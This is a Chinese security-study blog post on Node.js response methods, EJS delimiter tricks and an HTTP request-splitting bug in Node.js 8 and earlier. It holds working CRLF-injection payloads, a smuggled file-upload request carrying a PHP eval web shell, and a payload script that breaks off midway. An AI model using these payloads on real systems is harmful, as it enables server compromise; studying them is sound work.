<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ttoc.fun","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"appID":"1NWCFV229B","apiKey":"89f81f113af1e49e4b5061eb680ea44d","indexName":"hexo","hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="总结学习一下，重点把拆分攻击学习记忆一下，原型链污染单独开一篇写">
<meta property="og:type" content="article">
<meta property="og:title" content="nodejs(拆分攻击)">
<meta property="og:url" content="https://ttoc.fun/2023/04/06/nodejs(%E6%8B%86%E5%88%86%E6%94%BB%E5%87%BB)/index.html">
<meta property="og:site_name" content="Ttoc&#39;s blog">
<meta property="og:description" content="总结学习一下，重点把拆分攻击学习记忆一下，原型链污染单独开一篇写">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t01e1beeee10e196ba2.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t01005ff8722a4037e0.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t01911a74dee31030c4.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t01820e6d889f5f8892.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t01833dd0e566e383b1.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t0196c013fcb593f5dc.png">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t01aac9eb365660564a.png">
<meta property="article:published_time" content="2023-04-06T14:47:24.933Z">
<meta property="article:modified_time" content="2023-08-25T02:15:04.299Z">
<meta property="article:author" content="Ttoc">
<meta property="article:tag" content="js">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://p5.ssl.qhimg.com/t01e1beeee10e196ba2.png">

<link rel="canonical" href="https://ttoc.fun/2023/04/06/nodejs(%E6%8B%86%E5%88%86%E6%94%BB%E5%87%BB)/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>nodejs(拆分攻击) | Ttoc's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ttoc's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">必须从过去的错误学习教训，而非依赖过去的成功。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ttoc.fun/2023/04/06/nodejs(%E6%8B%86%E5%88%86%E6%94%BB%E5%87%BB)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Ttoc">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ttoc's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          nodejs(拆分攻击)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-04-06 22:47:24" itemprop="dateCreated datePublished" datetime="2023-04-06T22:47:24+08:00">2023-04-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-08-25 10:15:04" itemprop="dateModified" datetime="2023-08-25T10:15:04+08:00">2023-08-25</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">网络安全学习</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><code>总结学习一下，重点把拆分攻击学习记忆一下，原型链污染单独开一篇写</code></p>
<span id="more"></span>

<h2 id="res-render"><a href="#res-render" class="headerlink" title="res.render()"></a>res.render()</h2><p><code>res.render()</code>是 Node.js 中的一个方法，它可以<code>渲染视图并将渲染后的 HTML 字符串发送给客户端</code>。它可用于通过从服务器传递的数据呈现动态内容。</p>
<p>以下是在 Node.js 中使用 <code>res.render()</code> 的示例代码：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">get</span>(<span class="string">&#x27;/&#x27;</span>, <span class="keyword">function</span>(<span class="params">req, res</span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> data = &#123; <span class="attr">message</span>: <span class="string">&#x27;你好，世界！&#x27;</span> &#125;;</span><br><span class="line">  res.<span class="title function_">render</span>(<span class="string">&#x27;index&#x27;</span>, data);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>在此示例中，当用户访问根 URL 时，服务器将通过使用包含消息 <code> 你好，世界！</code>的 <code>data</code> 对象来呈现 <code>index</code> 视图，并向客户端发送响应。</p>
<p><code>index</code> 视图通常是使用模板语言编写的模板文件，例如 EJS、Handlebars 或 Pug。</p>
<h2 id="重定向概念"><a href="#重定向概念" class="headerlink" title="重定向概念"></a>重定向概念</h2><p>Express是一个基于<code>Node.js</code>实现的Web框架，</p>
<p>其响应HTTP请求的response对象中有两个用于URL跳转方法</p>
<p><code>res.location()</code>和<code>res.redirect()</code></p>
<h3 id="res-location"><a href="#res-location" class="headerlink" title="res.location()"></a>res.location()</h3><p>res.location()里面的参数有三种，一种是当前域名路径（例如”&#x2F;api&#x2F;post”），一种是绝对路径(“<a target="_blank" rel="noopener" href="https://www.oecom.cn/api/post">https://www.oecom.cn/api/post</a> “)，另一种就是直接一个字符串：back</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">res.<span class="keyword">location</span>(<span class="string">&#x27;/api/post&#x27;</span>);</span><br><span class="line">res.<span class="keyword">location</span>(<span class="string">&#x27;https://www.oecom.cn/api/post&#x27;</span>);</span><br><span class="line">res.<span class="keyword">location</span>(<span class="string">&#x27;back&#x27;</span>);</span><br></pre></td></tr></table></figure>

<h3 id="res-redirect"><a href="#res-redirect" class="headerlink" title="res.redirect"></a>res.redirect</h3><p><code>redirect()</code>可以添加两个参数，</p>
<p>如果第一个参数为数值类型，则代表重定向方式，第二个参数为字符串类型，就是需要跳转到的路径。</p>
<p>如果第一个参数就是字符串，则直接代表跳转的路径<br>重定向方式有两种情况，一种是<code>301</code>重定向（永久重定向），另一种是<code>302</code>重定向（临时重定向），如果第一个参数不填，则<code>默认为302</code>重定向。至于第二个参数路径，则和<code>location</code>一致。<br>在<code>redirect</code>中有一种方式是使用相对路径，即：<code>res.redirect(&quot;api/post&quot;)</code>，假设在程序在<code>/get</code>路由下，则表示要跳转的路径为<code>/get/api/post</code>。</p>
<p>个人不推荐这种方式，因为在后续的代码阅读时不利于快速理解重定向位置。</p>
<h2 id="delimiter"><a href="#delimiter" class="headerlink" title="delimiter"></a>delimiter</h2><p>这是对标签的分隔符定义的选项，有时候当对ssti一些标签进行了过滤，如果存在将参数进行渲染，且参数是可控，可以尝试<code>delimiter</code>添加进去，让其在渲染的时候可以覆盖修改<code>delimiter</code>内容，使得可以用其他分隔符绕过</p>
<h3 id="Custom-delimiters"><a href="#Custom-delimiters" class="headerlink" title="Custom delimiters"></a>Custom delimiters</h3><p>自定义分隔符可以基于每个模板应用，也可以全局应用：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> ejs = <span class="built_in">require</span>(<span class="string">&#x27;ejs&#x27;</span>),</span><br><span class="line">    users = [<span class="string">&#x27;geddy&#x27;</span>, <span class="string">&#x27;neil&#x27;</span>, <span class="string">&#x27;alex&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="comment">// Just one template</span></span><br><span class="line">ejs.<span class="title function_">render</span>(<span class="string">&#x27;&lt;p&gt;[?= users.join(&quot; | &quot;); ?]&lt;/p&gt;&#x27;</span>, &#123;<span class="attr">users</span>: users&#125;, &#123;<span class="attr">delimiter</span>: <span class="string">&#x27;?&#x27;</span>, <span class="attr">openDelimiter</span>: <span class="string">&#x27;[&#x27;</span>, <span class="attr">closeDelimiter</span>: <span class="string">&#x27;]&#x27;</span>&#125;);</span><br><span class="line"><span class="comment">// =&gt; &#x27;&lt;p&gt;geddy | neil | alex&lt;/p&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Or globally</span></span><br><span class="line">ejs.<span class="property">delimiter</span> = <span class="string">&#x27;?&#x27;</span>;</span><br><span class="line">ejs.<span class="property">openDelimiter</span> = <span class="string">&#x27;[&#x27;</span>;</span><br><span class="line">ejs.<span class="property">closeDelimiter</span> = <span class="string">&#x27;]&#x27;</span>;</span><br><span class="line">ejs.<span class="title function_">render</span>(<span class="string">&#x27;&lt;p&gt;[?= users.join(&quot; | &quot;); ?]&lt;/p&gt;&#x27;</span>, &#123;<span class="attr">users</span>: users&#125;);</span><br><span class="line"><span class="comment">// =&gt; &#x27;&lt;p&gt;geddy | neil | alex&lt;/p&gt;&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="NodeJS-中的-CRLF-SSRF-Injection"><a href="#NodeJS-中的-CRLF-SSRF-Injection" class="headerlink" title="NodeJS 中的 CRLF&#x2F;SSRF Injection"></a>NodeJS 中的 CRLF&#x2F;SSRF Injection</h2><blockquote>
<p>本文由<strong>WHOAMI</strong>原创发布</p>
<p>转载，请参考<a target="_blank" rel="noopener" href="https://www.anquanke.com/note/repost">转载声明</a>，注明出处： <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/240014">https://www.anquanke.com/post/id/240014</a></p>
<p>安全客 - 有思想的安全新媒体</p>
</blockquote>
<p>2018 年有研究者发现，当Node.js使用 <code>http.get</code> 向特定路径发出HTTP请求时，发出的请求实际上被定向到了不一样的路径！</p>
<p><img src="https://p5.ssl.qhimg.com/t01e1beeee10e196ba2.png" alt="img"></p>
<p>深入研究一下，发现这个问题是由Node.js将HTTP请求写入路径时，对Unicode字符的有损编码引起的。</p>
<blockquote>
<p>·注：nodejs&lt;&#x3D;8 的情况下存在 Unicode 字符损坏导致的 HTTP 拆分攻击，nodejs 不会对这些 Unicode 进行编码转义，因为它们不是 HTTP 控制字符</p>
</blockquote>
<h3 id="HTTP-请求路径中的-Unicode-字符损坏"><a href="#HTTP-请求路径中的-Unicode-字符损坏" class="headerlink" title="HTTP 请求路径中的 Unicode 字符损坏"></a>HTTP 请求路径中的 Unicode 字符损坏</h3><p>虽然用户发出的 HTTP 请求通常将请求路径指定为字符串，但Node.js最终必须将请求作为原始字节输出。JavaScript支持unicode字符串，因此将它们转换为字节意味着选择并应用适当的Unicode编码。对于不包含主体的请求，Node.js默认使用“latin1”，这是一种单字节编码字符集，不能表示高编号的Unicode字符，例如🐶这个表情。所以，当我们的请求路径中含有多字节编码的Unicode字符时，会被截断取最低字节，比如 <code>\u0130</code> 就会被截断为 <code>\u30</code>：</p>
<p><img src="https://p3.ssl.qhimg.com/t01005ff8722a4037e0.png" alt="img"></p>
<h3 id="Unicode-字符损坏造成的-HTTP-拆分攻击"><a href="#Unicode-字符损坏造成的-HTTP-拆分攻击" class="headerlink" title="Unicode 字符损坏造成的 HTTP 拆分攻击"></a>Unicode 字符损坏造成的 HTTP 拆分攻击</h3><p>刚才演示的那个 HTTP 请求路径中的 Unicode 字符损坏看似没有什么用处，但它可以在 nodejs 的 HTTP 拆分攻击中大显身手。</p>
<p>由于nodejs的HTTP库包含了阻止CRLF的措施，即如果你尝试发出一个URL路径中含有回车、换行或空格等控制字符的HTTP请求是，它们会被URL编码，所以正常的CRLF注入在nodejs中并不能利用：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">&quot;http&quot;</span>);</span><br><span class="line">&gt; http.<span class="title function_">get</span>(<span class="string">&#x27;http://47.101.57.72:4000/\r\n/WHOAMI&#x27;</span>).<span class="property">output</span></span><br><span class="line">[ <span class="string">&#x27;GET /%0D%0A/WHOAMI HTTP/1.1\r\nHost: 47.101.57.72:4000\r\nConnection: close\r\n\r\n&#x27;</span> ]</span><br></pre></td></tr></table></figure>

<p><img src="https://p4.ssl.qhimg.com/t01911a74dee31030c4.png" alt="img"></p>
<p>但不幸的是，上述的处理Unicode字符错误意味着可以规避这些保护措施。考虑如下的URL，其中包含一些高编号的Unicode字符：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="string">&#x27;http://47.101.57.72:4000/\u&#123;010D&#125;\u&#123;010A&#125;/WHOAMI&#x27;</span></span><br><span class="line"><span class="attr">http</span>:<span class="comment">//47.101.57.72:4000/čĊ/WHOAMI</span></span><br></pre></td></tr></table></figure>

<p>当 Node.js v8 或更低版本对此URL发出 <code>GET</code> 请求时，它不会进行编码转义，因为它们不是HTTP控制字符：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; http.<span class="title function_">get</span>(<span class="string">&#x27;http://47.101.57.72:4000/\u010D\u010A/WHOAMI&#x27;</span>).<span class="property">output</span></span><br><span class="line">[ <span class="string">&#x27;GET /čĊ/WHOAMI HTTP/1.1\r\nHost: 47.101.57.72:4000\r\nConnection: close\r\n\r\n&#x27;</span> ]</span><br></pre></td></tr></table></figure>

<p>但是当结果字符串被编码为 latin1 写入路径时，这些字符将分别被截断为 “\r”（%0d）和 “\n”（%0a）：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; <span class="title class_">Buffer</span>.<span class="title function_">from</span>(<span class="string">&#x27;http://47.101.57.72:4000/\u&#123;010D&#125;\u&#123;010A&#125;/WHOAMI&#x27;</span>, <span class="string">&#x27;latin1&#x27;</span>).<span class="title function_">toString</span>()</span><br><span class="line"><span class="string">&#x27;http://47.101.57.72:4000/\r\n/WHOAMI&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://p4.ssl.qhimg.com/t01820e6d889f5f8892.png" alt="img"></p>
<p>可见，通过在请求路径中包含精心选择的Unicode字符，攻击者可以欺骗Node.js并成功实现CRLF注入。</p>
<p>不仅是CRLF，所有的控制字符都可以通过这个构造出来。下面是我列举出来的表格，第一列是需要构造的字符，第二列是可构造出相应字符的高编号的Unicode码，第三列是高编号的Unicode码对应的字符，第四列是高编号的Unicode码对应的字符的URL编码：</p>
<table>
<thead>
<tr>
<th align="center">字符</th>
<th align="center">可由以下Unicode编码构造出</th>
<th align="center">Unicode编码对应的字符</th>
<th align="center">Unicode编码对应的字符对应的URL编码</th>
</tr>
</thead>
<tbody><tr>
<td align="center">回车符 \r</td>
<td align="center">\u010d</td>
<td align="center">č</td>
<td align="center">%C4%8D</td>
</tr>
<tr>
<td align="center">换行符 \n</td>
<td align="center">\u010a</td>
<td align="center">Ċ</td>
<td align="center">%C4%8A</td>
</tr>
<tr>
<td align="center">空格</td>
<td align="center">\u0120</td>
<td align="center">Ġ</td>
<td align="center">%C4%A0</td>
</tr>
<tr>
<td align="center">反斜杠 \</td>
<td align="center">\u0122</td>
<td align="center">Ģ</td>
<td align="center">%C4%A2</td>
</tr>
<tr>
<td align="center">单引号 ‘</td>
<td align="center">\u0127</td>
<td align="center">ħ</td>
<td align="center">%C4%A7</td>
</tr>
<tr>
<td align="center">反引号 &#96;</td>
<td align="center">\u0160</td>
<td align="center">Š</td>
<td align="center">%C5%A0</td>
</tr>
<tr>
<td align="center">叹号 !</td>
<td align="center">\u0121</td>
<td align="center">ġ</td>
<td align="center">%C4%A1</td>
</tr>
</tbody></table>
<p>这个bug已经在Node.js10中被修复，如果请求路径包含非Ascii字符，则会抛出错误。但是对于 Node.js v8 或更低版本，如果有下列情况，任何发出HTTP请求的服务器都可能受到通过请求拆实现的SSRF的攻击：</p>
<ul>
<li>接受来自用户输入的Unicode数据</li>
<li>并将其包含在HTTP请求的路径中</li>
<li>且请求具有一个0长度的主体（比如一个 <code>GET</code> 或者 <code>DELETE</code>）</li>
</ul>
<h3 id="在-HTTP-状态行注入恶意首部字段"><a href="#在-HTTP-状态行注入恶意首部字段" class="headerlink" title="在 HTTP 状态行注入恶意首部字段"></a>在 HTTP 状态行注入恶意首部字段</h3><p>由于 NodeJS 的这个 CRLF 注入点在 HTTP 状态行，所以如果我们要注入恶意的 HTTP 首部字段的话还需要闭合状态行中 <code>HTTP/1.1</code> ，即保证注入后有正常的 HTTP 状态行：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; http.<span class="title function_">get</span>(<span class="string">&#x27;http://47.101.57.72:4000/\u0120HTTP/1.1\u010D\u010ASet-Cookie:\u0120PHPSESSID=whoami&#x27;</span>).<span class="property">output</span></span><br><span class="line">[ <span class="string">&#x27;GET /ĠHTTP/1.1čĊSet-Cookie:ĠPHPSESSID=whoami HTTP/1.1\r\nHost: 47.101.57.72:4000\r\nConnection: close\r\n\r\n&#x27;</span> ]</span><br></pre></td></tr></table></figure>

<p><img src="https://p4.ssl.qhimg.com/t01833dd0e566e383b1.png" alt="img"></p>
<p>如上图所示，成功构造出了一个 Set-Cookie 首部字段，虽然后面还有一个 <code>HTTP/1.1</code> ，但我们根据该原理依然可以将其闭合：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; http.<span class="title function_">get</span>(<span class="string">&#x27;http://47.101.57.72:4000/\u0120HTTP/1.1\u010D\u010ASet-Cookie:\u0120PHPSESSID=whoami\u010D\u010Atest:&#x27;</span>).<span class="property">output</span></span><br><span class="line">[ <span class="string">&#x27;GET /ĠHTTP/1.1čĊSet-Cookie:ĠPHPSESSID=whoamičĊtest: HTTP/1.1\r\nHost: 47.101.57.72:4000\r\nConnection: close\r\n\r\n&#x27;</span> ]</span><br></pre></td></tr></table></figure>

<p><img src="https://p5.ssl.qhimg.com/t0196c013fcb593f5dc.png" alt="img"></p>
<p>这样，我们便可以构造 “任意” 的HTTP请求了。</p>
<h3 id="在-HTTP-状态行注入完整-HTTP-请求"><a href="#在-HTTP-状态行注入完整-HTTP-请求" class="headerlink" title="在 HTTP 状态行注入完整 HTTP 请求"></a>在 HTTP 状态行注入完整 HTTP 请求</h3><p>首先，由于 NodeJS 的这个 CRLF 注入点在 HTTP 状态行，所以如果我们要注入完整的 HTTP 请求的话需要先闭合状态行中 <code>HTTP/1.1</code> ，即保证注入后有正常的 HTTP 状态行。其次为了不让原来的 <code>HTTP/1.1</code> 影响我们新构造的请求，我们还需要再构造一次 <code>GET /</code> 闭合原来的 HTTP 请求。</p>
<p>假设目标主机存在SSRF，需要我们在目标主机本地上传文件。我们需要尝试构造如下这个文件上传的完整 POST 请求：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/upload.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>437</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>multipart/form-data; boundary=----WebKitFormBoundaryjDb9HMGTixAA7Am6</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>PHPSESSID=nk67astv61hqanskkddslkgst4</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">Content-Disposition: form-data; name=<span class="string">&quot;MAX_FILE_SIZE&quot;</span></span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php"><span class="number">100000</span></span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">Content-Disposition: form-data; name=<span class="string">&quot;uploaded&quot;</span>; filename=<span class="string">&quot;shell.php&quot;</span></span></span><br><span class="line"><span class="language-php">Content-Type: application/octet-stream</span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;whoami&quot;</span>]);<span class="meta">?&gt;</span></span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">Content-Disposition: form-data; name=<span class="string">&quot;Upload&quot;</span></span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php">Upload</span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6--</span></span><br></pre></td></tr></table></figure>

<p>为了方便，我们将这个POST请求里面的所有的字符包括控制符全部用上述的高编号Unicode码表示：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;&#x27;&#x27; HTTP/1.1</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">POST /upload.php HTTP/1.1</span></span><br><span class="line"><span class="string">Host: 127.0.0.1</span></span><br><span class="line"><span class="string">Content-Length: 437</span></span><br><span class="line"><span class="string">Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="string">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36</span></span><br><span class="line"><span class="string">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span></span><br><span class="line"><span class="string">Accept-Encoding: 